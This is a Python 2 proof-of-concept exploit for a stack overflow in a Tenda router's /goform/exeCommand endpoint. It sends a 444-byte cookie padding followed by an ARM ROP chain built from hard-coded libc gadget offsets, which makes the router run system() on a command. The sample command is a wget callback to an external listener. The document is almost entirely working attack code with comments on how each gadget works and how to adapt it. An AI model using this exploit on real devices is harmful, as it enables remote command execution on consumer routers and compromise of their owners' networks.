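# Tenda router /goform/exeCommand stack-overflow PoC (Python 2: urllib2; on
# Python 3 struct.pack() returns bytes and the str concatenation below fails).
# `host`, `struct` and `urllib2` are defined/imported earlier in the script.
# Only run this against a device you are authorised to test.
url = "http://%s:80/goform/exeCommand" % (host)

# Hard-coded for one specific firmware/libc build: the libc load address and
# the gadget/system offsets below must be re-derived for any other image.
libc = 0x409a7000

# Gadget 1: pop {r3, pc}. Pops `system` into r3 and gadget 2 into pc.
gadget1 = struct.pack("< I", 0x00018298 + libc)

# libc system(); placed on the stack so gadget 1 pops it into r3.
system = struct.pack("< I", 0x0005A270 + libc)

# Gadget 2: mov r0, sp; blx r3. Once gadget 1 has consumed its two words,
# sp points at `command`, so this becomes system(command).
gadget2 = struct.pack("< I", 0x00040cb8 + libc)

# Callback host; replace with your own listener. Whatever is here runs as the
# router's web-server process, so keep it a single shell command.
command = "wget 192.168.174.136"

# 444 'A's plus the 4-byte ".gif" marker fill the buffer up to the saved
# return address, followed by the chain and then the command string it uses.
# ".gif" is kept byte-for-byte from the original PoC; its role is not evident
# from this fragment (presumably something the target's cookie handling looks
# for) -- do not drop it.
password = "A" * 444 + ".gif" + gadget1 + system + gadget2 + command

req = urllib2.Request(url)
req.add_header("Cookie", "password=%s" % password)
try:
    # A blind overflow returns nothing useful; the usual sign it fired is the
    # httpd dying or stalling, so bound the wait instead of hanging forever.
    resp = urllib2.urlopen(req, timeout=10)
    print("target answered HTTP %d -- overflow may not have triggered" % resp.getcode())
except IOError as exc:
    # URLError/HTTPError/socket.error (incl. socket.timeout) all derive from
    # IOError on Python 2. A reset or timeout here is the expected outcome of
    # a successful smash, so report it instead of swallowing it; the bare
    # `except: pass` also hid NameErrors and typos in the payload code.
    print("no clean response from %s: %s" % (url, exc))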